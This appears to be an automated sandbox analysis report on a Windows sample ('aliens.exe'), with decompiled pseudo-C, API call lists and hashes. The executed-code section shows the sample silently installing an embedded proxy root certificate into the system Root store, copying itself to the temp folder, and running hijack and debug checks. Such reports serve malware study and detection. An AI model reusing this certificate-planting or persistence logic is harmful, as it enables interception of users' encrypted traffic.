                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01228fa1
                                                                                                                                                    0x01228fa5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01228fa5

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Shell.Explorer$about:blank
                                                                                                                                                    • API String ID: 0-874089819
                                                                                                                                                    • Opcode ID: 6da87a2b87da3749841a9d157bd414ee5611a74d10500a51b0b52350466d9b8a
                                                                                                                                                    • Instruction ID: 53773bed8f5117a713a1c8bf8ead78487750ed3589bbbb354b753fda4147b876
                                                                                                                                                    • Opcode Fuzzy Hash: 6da87a2b87da3749841a9d157bd414ee5611a74d10500a51b0b52350466d9b8a
                                                                                                                                                    • Instruction Fuzzy Hash: 6A216176224225AFDB08EF65D894E7E77A5FB44720B44845DFA0A8B255DA70EC00CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121EB32, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0121EAB3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0121EAD2
                                                                                                                                                      • Part of subcall function 0121EAB3: GetProcAddress.KERNEL32(012571C0,CryptUnprotectMemory), ref: 0121EAE2
                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,0121EB2C), ref: 0121EBC4
                                                                                                                                                    Strings
                                                                                                                                                    • CryptUnprotectMemory failed, xrefs: 0121EBBC
                                                                                                                                                    • CryptProtectMemory failed, xrefs: 0121EB7B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                    • API String ID: 2190909847-396321323
                                                                                                                                                    • Opcode ID: 650440cadbf8f686d64e57c7d279d4eb576ad364ceb9bad317dc8aea0af03e3f
                                                                                                                                                    • Instruction ID: 5c367e70a41fb8d9b005bee5ae4af89fbca54dd3901c22a61744f97c0b7e25ad
                                                                                                                                                    • Opcode Fuzzy Hash: 650440cadbf8f686d64e57c7d279d4eb576ad364ceb9bad317dc8aea0af03e3f
                                                                                                                                                    • Instruction Fuzzy Hash: C1115C316252269BDB27DF24EC05E6E7B89FF20620B064109FD036B289E7709F0087E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121130B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E0121130B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E0121D9B1(0x124fee8, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E0121D9D8(0x124fee8, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0x1271154(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0x12425b4);
								}
							}
						}
					}
				}
				return 0;
			}





                                                                                                                                                    0x01211312
                                                                                                                                                    0x01211375
                                                                                                                                                    0x01211314
                                                                                                                                                    0x01211314
                                                                                                                                                    0x0121131b
                                                                                                                                                    0x01211331
                                                                                                                                                    0x0121133a
                                                                                                                                                    0x0121133f
                                                                                                                                                    0x01211347
                                                                                                                                                    0x0121134f
                                                                                                                                                    0x01211357
                                                                                                                                                    0x01211365
                                                                                                                                                    0x01211365
                                                                                                                                                    0x01211357
                                                                                                                                                    0x01211347
                                                                                                                                                    0x0121133a
                                                                                                                                                    0x0121131b
                                                                                                                                                    0x0121137d

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0121D9D8: _swprintf.LIBCMT ref: 0121D9FE
                                                                                                                                                      • Part of subcall function 0121D9D8: _strlen.LIBCMT ref: 0121DA1F
                                                                                                                                                      • Part of subcall function 0121D9D8: SetDlgItemTextW.USER32(?,0124D154,?), ref: 0121DA7F
                                                                                                                                                      • Part of subcall function 0121D9D8: GetWindowRect.USER32(?,?), ref: 0121DAB9
                                                                                                                                                      • Part of subcall function 0121D9D8: GetClientRect.USER32(?,?), ref: 0121DAC5
                                                                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0121134F
                                                                                                                                                    • SetWindowTextW.USER32(00000000,012425B4), ref: 01211365
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 2622349952-4108050209
                                                                                                                                                    • Opcode ID: 5305499b537ac7161e32ae9dc5096a8282df927495f31652345891f82f009377
                                                                                                                                                    • Instruction ID: 7764a064a6f87f4efadf7c9cb75b5bc34e98f159435a16444d4bdaf19db865f2
                                                                                                                                                    • Opcode Fuzzy Hash: 5305499b537ac7161e32ae9dc5096a8282df927495f31652345891f82f009377
                                                                                                                                                    • Instruction Fuzzy Hash: 5FF0813012024DA7EF298FB5A80DBEA3FD9BF30245F084004FF4554999C775C1A2DB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012207AC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                    			E012207AC(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E01216E21(E01216E26(_t6, 0x124ff50, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0x124ff50, 0x124ff50, 2);
				}
				return _t2;
			}






                                                                                                                                                    0x012207ac
                                                                                                                                                    0x012207b2
                                                                                                                                                    0x012207bb
                                                                                                                                                    0x012207c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012207e3
                                                                                                                                                    0x012207e4

                                                                                                                                                    APIs
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,012208CB,?,?,0122094F,?,?,?,?,?,01220939), ref: 012207B2
                                                                                                                                                    • GetLastError.KERNEL32(?,?,0122094F,?,?,?,?,?,01220939), ref: 012207BE
                                                                                                                                                      • Part of subcall function 01216E26: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01216E44
                                                                                                                                                    Strings
                                                                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 012207C7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                                                                    • Opcode ID: b99693767706659d1b5a330c92f47095fd49aabaa6ca260b68295b9a7d4edfa3
                                                                                                                                                    • Instruction ID: 7d9873081aaa975ca2d47becdd1eacd0c1efb067e8df808ba33ca1cb643ceec3
                                                                                                                                                    • Opcode Fuzzy Hash: b99693767706659d1b5a330c92f47095fd49aabaa6ca260b68295b9a7d4edfa3
                                                                                                                                                    • Instruction Fuzzy Hash: 3ED05E36528032B7D7156669BC0DDBF3A479B72330B20571DF639691E9CA600D418AD6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121D98E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0121D98E(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}





                                                                                                                                                    0x0121d991
                                                                                                                                                    0x0121d9a1
                                                                                                                                                    0x0121d9a9
                                                                                                                                                    0x0121d9ab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d9ab
                                                                                                                                                    0x0121d9b0

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0121D26F,?), ref: 0121D993
                                                                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0121D26F,?), ref: 0121D9A1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FindHandleModuleResource
                                                                                                                                                    • String ID: RTL
                                                                                                                                                    • API String ID: 3537982541-834975271
                                                                                                                                                    • Opcode ID: 45b3445991989e05655a7c4ff61b6560496af7db1fbb6b8616aeca6020a865e9
                                                                                                                                                    • Instruction ID: 6a0534acf34cab083ffd4492b1b9fbc5fa7875df5d3f8de85b2b5a1fd3a31465
                                                                                                                                                    • Opcode Fuzzy Hash: 45b3445991989e05655a7c4ff61b6560496af7db1fbb6b8616aeca6020a865e9
                                                                                                                                                    • Instruction Fuzzy Hash: A3C012362A5312E7EB342A667D0DB832E8A6B60B52F191448B281DA1C8DAE5C440C7A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Analysis Process: aliens.exe PID: 2992 Parent PID: 2172 aliens.exeCOMMON

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 1001F720, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 177encryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 52%
                                                                                                                                                    			E1001F720(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				char* _v16;
				BYTE* _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				char _v299;
				char _v300;
				char _v563;
				char _v564;
				signed int _v568;
				void* __ebp;
				BYTE* _t66;
				int _t69;
				int _t70;
				int _t71;
				long _t72;
				int _t75;
				signed int _t90;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t127;

				_t119 = __esi;
				_t118 = __edi;
				_t91 = __ebx;
				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DKzT/2v+9ty2bsEBnv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
				_v24 = 0;
				_v8 = 0;
				_v28 = 0;
				_v12 = 0;
				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
					_t66 = L1000CE56(__ebx, _v12, __edi, __esi, _v12);
					_t122 = _t121 + 4;
					_v20 = _t66;
					_t133 = _v20;
					if(_v20 != 0) {
						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
						_t69 = _v12;
						__imp__CertCreateCertificateContext(1, _v20, _t69); // executed
						_v8 = _t69;
						_push(_v20);
						_t70 = E1000CA30(__ebx, __edi, __esi, _t133);
						_t123 = _t122 + 4;
						if(_v8 != 0) {
							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root"); // executed
							_v28 = _t70;
							if(_v28 != 0) {
								_t71 = _v8;
								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0); // executed
								if(_t71 == 0) {
									_t72 = GetLastError();
									__eflags = _t72 - 0x80092005;
									if(_t72 == 0x80092005) {
										_v36 = 0;
										_v32 = 0;
										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
										__eflags = _v36;
										if(_v36 > 0) {
											_t75 = L1000CE56(__ebx,  &_v36, __edi, __esi, _v36 + 1);
											_t124 = _t123 + 4;
											_v32 = _t75;
											__eflags = _v32;
											if(_v32 != 0) {
												E1000CF20(_t118, _v32, 0, _v36 + 1);
												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
												_v564 = 0;
												E1000CF20(_t118,  &_v563, 0, 0x103);
												_v300 = 0;
												E1000CF20(_t118,  &_v299, 0, 0x103);
												_t127 = _t124 + 0x24;
												_v568 = 0;
												while(1) {
													__eflags = _v568 - _v36;
													if(_v568 >= _v36) {
														break;
													}
													E1000CC93(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
													_t127 = _t127 + 0xc;
													_t90 = _v568 + 1;
													__eflags = _t90;
													_v568 = _t90;
												}
												E1000CC93(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
												_v24 = E1001F680(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
												_push(_v32);
												E1000CA30(_t91, _t118, _t119, __eflags);
											}
										}
									}
								} else {
									_v24 = 1;
								}
								__imp__CertCloseStore(_v28, 1);
							}
							__imp__CertFreeCertificateContext(_v8);
						}
					}
				}
				return _v24;
			}






























                                                                                                                                                    0x1001f720
                                                                                                                                                    0x1001f720
                                                                                                                                                    0x1001f720
                                                                                                                                                    0x1001f729
                                                                                                                                                    0x1001f730
                                                                                                                                                    0x1001f737
                                                                                                                                                    0x1001f73e
                                                                                                                                                    0x1001f745
                                                                                                                                                    0x1001f766
                                                                                                                                                    0x1001f77a
                                                                                                                                                    0x1001f77f
                                                                                                                                                    0x1001f782
                                                                                                                                                    0x1001f785
                                                                                                                                                    0x1001f789
                                                                                                                                                    0x1001f7a3
                                                                                                                                                    0x1001f7a9
                                                                                                                                                    0x1001f7b3
                                                                                                                                                    0x1001f7b9
                                                                                                                                                    0x1001f7bf
                                                                                                                                                    0x1001f7c0
                                                                                                                                                    0x1001f7c5
                                                                                                                                                    0x1001f7cc
                                                                                                                                                    0x1001f7e2
                                                                                                                                                    0x1001f7e8
                                                                                                                                                    0x1001f7ef
                                                                                                                                                    0x1001f7f9
                                                                                                                                                    0x1001f801
                                                                                                                                                    0x1001f809
                                                                                                                                                    0x1001f817
                                                                                                                                                    0x1001f81d
                                                                                                                                                    0x1001f822
                                                                                                                                                    0x1001f828
                                                                                                                                                    0x1001f82f
                                                                                                                                                    0x1001f842
                                                                                                                                                    0x1001f848
                                                                                                                                                    0x1001f84c
                                                                                                                                                    0x1001f859
                                                                                                                                                    0x1001f85e
                                                                                                                                                    0x1001f861
                                                                                                                                                    0x1001f864
                                                                                                                                                    0x1001f868
                                                                                                                                                    0x1001f87b
                                                                                                                                                    0x1001f891
                                                                                                                                                    0x1001f897
                                                                                                                                                    0x1001f8ac
                                                                                                                                                    0x1001f8b4
                                                                                                                                                    0x1001f8c9
                                                                                                                                                    0x1001f8ce
                                                                                                                                                    0x1001f8d1
                                                                                                                                                    0x1001f8ec
                                                                                                                                                    0x1001f8f2
                                                                                                                                                    0x1001f8f5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001f91c
                                                                                                                                                    0x1001f921
                                                                                                                                                    0x1001f8e3
                                                                                                                                                    0x1001f8e3
                                                                                                                                                    0x1001f8e6
                                                                                                                                                    0x1001f8e6
                                                                                                                                                    0x1001f939
                                                                                                                                                    0x1001f95d
                                                                                                                                                    0x1001f963
                                                                                                                                                    0x1001f964
                                                                                                                                                    0x1001f969
                                                                                                                                                    0x1001f868
                                                                                                                                                    0x1001f84c
                                                                                                                                                    0x1001f80b
                                                                                                                                                    0x1001f80b
                                                                                                                                                    0x1001f80b
                                                                                                                                                    0x1001f972
                                                                                                                                                    0x1001f972
                                                                                                                                                    0x1001f97c
                                                                                                                                                    0x1001f97c
                                                                                                                                                    0x1001f7cc
                                                                                                                                                    0x1001f789
                                                                                                                                                    0x1001f988

                                                                                                                                                    APIs
                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                    • CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                      • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,10330FC8,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                      • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,10330FC8), ref: 1000CAA9
                                                                                                                                                    • CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                    • CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1001F817
                                                                                                                                                    • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F842
                                                                                                                                                    • _memset.LIBCMT ref: 1001F87B
                                                                                                                                                    • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F891
                                                                                                                                                    • _memset.LIBCMT ref: 1001F8AC
                                                                                                                                                    • _memset.LIBCMT ref: 1001F8C9
                                                                                                                                                    • _sprintf.LIBCMT ref: 1001F91C
                                                                                                                                                    • _sprintf.LIBCMT ref: 1001F939
                                                                                                                                                    • CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
                                                                                                                                                    • String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
                                                                                                                                                    • API String ID: 3311258246-1857994723
                                                                                                                                                    • Opcode ID: f49381e4a448a5a10bd26d01b906ad9164d89e501bbb782af6f701153be2db18
                                                                                                                                                    • Instruction ID: afe3fe35dc8e16d3553f6fe7244bb1c21b11eefa07642306de8368dfec16bcca
                                                                                                                                                    • Opcode Fuzzy Hash: f49381e4a448a5a10bd26d01b906ad9164d89e501bbb782af6f701153be2db18
                                                                                                                                                    • Instruction Fuzzy Hash: 986133B5D00219BBEB10DB90CC99FFEB778EB48704F104598F605BA280D775AA85CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 100202D0, Relevance: 31.7, APIs: 10, Strings: 8, Instructions: 169COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E100202D0(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				long _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				void* __esi;
				void* _t46;
				int _t47;
				void* _t56;
				void* _t57;
				int _t61;
				intOrPtr _t72;
				int _t74;
				int _t76;
				void* _t100;
				intOrPtr _t103;
				void* _t107;
				void* _t108;
				void* _t110;
				intOrPtr _t112;
				void* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t118;
				void* _t123;

				_t123 = __eflags;
				_t99 = __edi;
				_t81 = __ebx;
				_push(0xffffffff);
				_push(E10022B61);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t103;
				_push(_t100);
				E1001FD60();
				_v312 = 0;
				E1000CF20(__edi,  &_v311, 0, 0x103);
				GetModuleFileNameA(0,  &_v312, 0x104);
				E1001A600(__ebx, _t99, _t100, _t123,  &_v44); // executed
				_v8 = 0;
				_t46 = E10001A70( &_v312, E100011E0( &_v44));
				_t107 = _t103 - 0x264 + 0x18;
				_t124 = _t46;
				if(_t46 == 0) {
					_t47 = E1001A0F0("Global\\exist_sign__install_r3"); // executed
					_t108 = _t107 + 4;
					__eflags = _t47;
					if(_t47 == 0) {
						_v576 = 0;
						E1000CF20(_t99,  &_v575, 0, 0x103);
						GetTempPathA(0x104,  &_v576);
						E1000CD96( &_v576,  &_v576, 0x104, E100011E0( &_v44));
						_t110 = _t108 + 0x18;
						CopyFileA( &_v312,  &_v576, 0); // executed
						_v580 = GetTickCount();
						while(1) {
							_t56 = E1001A170( &_v312); // executed
							_t101 = _t56;
							_t57 = E1001A170( &_v576); // executed
							_t110 = _t110 + 8;
							__eflags = _t56 - _t57;
							if(__eflags == 0) {
								break;
							}
							Sleep(0x3e8);
							__eflags = GetTickCount() - _v580 - 0x7530;
							if(__eflags <= 0) {
								continue;
							} else {
							}
							break;
						}
						E1001FDB0(); // executed
						_t112 = _t110 - 0x1c;
						_t88 = _t112;
						_v588 = _t112;
						_v612 = E10001160(_t112, __eflags, "status=main_start");
						E1001FF90(_t81, _t99, _t101, __eflags); // executed
						_t113 = _t112 + 0x1c;
						_t61 = PathFileExistsA("C:\\hijack"); // executed
						__eflags = _t61;
						if(__eflags != 0) {
							L15:
							_t114 = _t113 - 0x1c;
							_v592 = _t114;
							_v616 = E10001160(_t114, __eflags, "status=check_debug");
